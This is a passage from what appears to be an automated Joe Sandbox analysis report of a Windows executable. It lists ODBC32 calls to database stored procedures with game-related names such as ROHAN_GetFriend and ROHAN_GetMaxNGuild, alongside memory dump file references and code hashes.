                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004311CC
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00431204
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_DestroySiegeBuilding] (?)}, xrefs: 00431184
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_DestroySiegeBuilding] (?)}
                                                                                      • API String ID: 0-499424334
                                                                                      • Opcode ID: a37937604e8cb41581bcc88b7aed2796470cce4e11fa9c3936f787c5b23767b0
                                                                                      • Instruction ID: 5370f952ebb7c4a4bfd750166644337bf0df096b6359934bebe40965f91896a1
                                                                                      • Opcode Fuzzy Hash: a37937604e8cb41581bcc88b7aed2796470cce4e11fa9c3936f787c5b23767b0
                                                                                      • Instruction Fuzzy Hash: CF1112B0E8421AABEB64CF44CC42FAA7374EB44714F118199F62C6A2C4D67979808F59
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_GetFriend] (?)},000000FD), ref: 004324CA
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00432509
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00432541
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_GetFriend] (?)}, xrefs: 004324C1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_GetFriend] (?)}
                                                                                      • API String ID: 0-989915190
                                                                                      • Opcode ID: 91863826a00242da09067007fe9479bb7c348ed793b7b2778eff6a8bd794c6e5
                                                                                      • Instruction ID: ef44f8327274ffa8e992c487ed5434e1bfdee7817b3ee5f6e37350fc3426912d
                                                                                      • Opcode Fuzzy Hash: 91863826a00242da09067007fe9479bb7c348ed793b7b2778eff6a8bd794c6e5
                                                                                      • Instruction Fuzzy Hash: 161121B0A40258ABEB24CF44CC42FAD73B5FB44714F14828AF6586A2C0DAB56D409F98
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_GetMaxNGuild] (?) } ,000000FD), ref: 004246DD
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042470D
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00424739
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_GetMaxNGuild] (?) } , xrefs: 004246D4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_GetMaxNGuild] (?) }
                                                                                      • API String ID: 0-915918733
                                                                                      • Opcode ID: 03d59a90ed2f1f619dacafe24cfb9a045a06fbf313fbe854e1c95bee0dbd0b5a
                                                                                      • Instruction ID: f47e2565f7d9c67925826dfcff188297d33bb2dd10663f09b954a046049355a1
                                                                                      • Opcode Fuzzy Hash: 03d59a90ed2f1f619dacafe24cfb9a045a06fbf313fbe854e1c95bee0dbd0b5a
                                                                                      • Instruction Fuzzy Hash: F411DEB5A44308ABEB14CF94CC52FAE7775EB84B18F208209F7186F3C4D6B5A850CB58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_GetBlock] (?)},000000FD), ref: 00432732
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00432771
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004327A9
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_GetBlock] (?)}, xrefs: 00432729
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_GetBlock] (?)}
                                                                                      • API String ID: 0-2166742067
                                                                                      • Opcode ID: 91c2b612f89150722df79f01fc55aed4a636f7675fa349b8bda66aa95fc50707
                                                                                      • Instruction ID: 94e3733dd991de42adc38b9770581bc15b154033e59a4aa513dbd026b3495fbb
                                                                                      • Opcode Fuzzy Hash: 91c2b612f89150722df79f01fc55aed4a636f7675fa349b8bda66aa95fc50707
                                                                                      • Instruction Fuzzy Hash: A811E2B1B4521DABFB24CF44CC41FEA7374EB84714F104289F6146A2C5D6B56B508F99
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_GetMaxNGuildMark] (?) } ,000000FD), ref: 00424900
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042493F
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00424977
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_GetMaxNGuildMark] (?) } , xrefs: 004248F7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_GetMaxNGuildMark] (?) }
                                                                                      • API String ID: 0-487146417
                                                                                      • Opcode ID: 48edd7fd241feab3e3788bb1480843c2d54cdaa382ee852e2f42cca87031f1a2
                                                                                      • Instruction ID: 65561e6992041605236e856bfed97de7d7d96b974b0925506b45b0916ce76eee
                                                                                      • Opcode Fuzzy Hash: 48edd7fd241feab3e3788bb1480843c2d54cdaa382ee852e2f42cca87031f1a2
                                                                                      • Instruction Fuzzy Hash: E311F1B4A40218ABEB64CF64CC52F9A7374EB45714F208289F71C6A3C5D6B56D90CF58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_GetMaxNGuildMember] (?) } ,000000FD), ref: 00424A8C
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00424ACB
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00424B03
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_GetMaxNGuildMember] (?) } , xrefs: 00424A83
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_GetMaxNGuildMember] (?) }
                                                                                      • API String ID: 0-141562404
                                                                                      • Opcode ID: 4fea9f8cc0d31b562694be13f0f287c26a367f9f767dbe5e942997efb76ceacf
                                                                                      • Instruction ID: 185a31892f4e271109d394eef7eaa4148795d8404fa608e4727cd0395c23437f
                                                                                      • Opcode Fuzzy Hash: 4fea9f8cc0d31b562694be13f0f287c26a367f9f767dbe5e942997efb76ceacf
                                                                                      • Instruction Fuzzy Hash: 90111FB0A44318ABEB60CF44CC51F9A7376EB84714F208289F7186A2D4C771A980CF59
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_ConsignGetItemList] (?)},000000FD), ref: 004300B0
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004300EF
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00430124
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_ConsignGetItemList] (?)}, xrefs: 004300A7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_ConsignGetItemList] (?)}
                                                                                      • API String ID: 0-3611377028
                                                                                      • Opcode ID: e35f1aa5121f5cca1a2fd3ee9e9dcdcbf19ea9118434d5ac1249f54078d46365
                                                                                      • Instruction ID: cc6997be2512ce304c86f38cef3d5dc163f074f95cf94b9f0ba0e57eeeb1fb36
                                                                                      • Opcode Fuzzy Hash: e35f1aa5121f5cca1a2fd3ee9e9dcdcbf19ea9118434d5ac1249f54078d46365
                                                                                      • Instruction Fuzzy Hash: 59113BB0A8021BABEB24CF44DC41FBA7375EBC4714F1041D9F6246B2C4D6726D508F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_DelLootItem](?)},000000FD), ref: 00436488
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004364C7
